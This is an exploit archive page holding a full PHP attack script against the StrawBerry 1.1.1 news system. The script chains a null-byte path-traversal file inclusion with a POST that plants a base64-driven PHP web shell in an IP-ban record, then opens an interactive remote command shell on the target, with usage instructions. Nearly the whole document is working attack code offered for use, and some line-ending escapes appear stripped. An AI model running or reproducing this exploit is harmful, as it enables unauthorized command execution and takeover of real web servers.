[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : StrawBerry 1.1.1 LFI / Remote Command Execution Exploit
# Published : 2009-05-14
# Author : [AVT]
# Previous Title : beLive v.0.2.3 (arch.php arch) Local File Inclusion Vulnerability
# Next Title : MRCGIGUY ClickBank Directory 1.0.1 Insecure Cookie Handling Vuln
<?php
/*********************************************************************
* StrawBerry 1.1.1 LFI / Remote Command Execution Exploit *
* Site: http://strawberry.goodgirl.ru/ *
*********************************************************************
* magic_quotes_gpc = Off *
*********************************************************************
* Author: [AVT] *
* Date : 10.05.09 *
* My Site: http://antichat.ru/ *
*********************************************************************/
set_time_limit(0);
error_reporting(0);
list($cli,$host,$path) = $argv;
if ($argc != 3) {
print "no-------------------------------------------------------------on";
print "r| StrawBerry 1.1.1 LFI / Remote Command Execution Exploit |n";
print "r| Site: http://strawberry.goodgirl.ru/ |n";
print "ro-------------------------------------------------------------on";
print "r| Author: [AVT] |n";
print "r| My Site: http://antichat.ru/ |n";
print "ro-------------------------------------------------------------on";
print "r| Usage: php expl.php [host] [path] |n";
print "r| host localhost |n";
print "r| path /news/ |n";
print "r| Example: php expl.php site.com /news/ |n";
print "ro-------------------------------------------------------------on";
exit;
}
if (check_host ())
{
post_shell();
}
use_shell();
function check_host ()
{
global $host,$path;
$data = "GET {$path}example/index.php?do=../../../../db/base/ipban.MYD%00 HTTP/1.1rn";
$data .= "Host: $hostrn";
$data .= "Connection: closernrn";
$html = send ($host,$data);
if (!stristr($html,'a:'))
{
print "ro-------------------------------------------------------------on";
print "r| Exploit Failed! |n";
print "ro-------------------------------------------------------------on";
exit;
}
elseif (stristr($html,'<code>'))
{
return false;
}
else
{
return true;
}
}
function send ($host,$data)
{
if (!$sock = @fsockopen($host,80))
{
die("Connection refused, try again!n");
}
fputs($sock,$data);
while (!feof($sock)) { $html .= fgets($sock); }
fclose($sock);
return $html;
}
function post_shell()
{
global $host,$path;
$post = "add_ip=" . urlencode('<code><?php passthru(base64_decode($_GET[cmd]));?></code>') . "&action=add&mod=ipban";
$data .= "POST {$path}example/index.php?do=../../../../../inc/mod/ipban.mdu%00 HTTP/1.1rn";
$data .= "Host: $hostrn";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "Content-Length: ".strlen($post)."rnrn";
$data .= "$postrnrn";
send ($host,$data);
}
function use_shell()
{
while (1)
{
echo "[Shell]~$: ";
$cmd = stripslashes(trim(fgets(STDIN)));
if (preg_match('/^(exit|--exit|quit|--quit)$/i',$cmd)) die("nExitedn");
print exec_cmd($cmd);
}
}
function exec_cmd($cmd)
{
global $host,$path;
$cmd = base64_encode($cmd);
$data .= "GET {$path}example/index.php?cmd={$cmd}&do=../../../../db/base/ipban.MYD%00 HTTP/1.1rn";
$data .= "Host: $hostrn";
$data .= "Connection: closernrn";
$html = send ($host,$data);
preg_match_all('/<code>(.*)</code>/si', $html, $match);
return $match[1][0];
}
?>
# www.Syue.com [2009-05-14]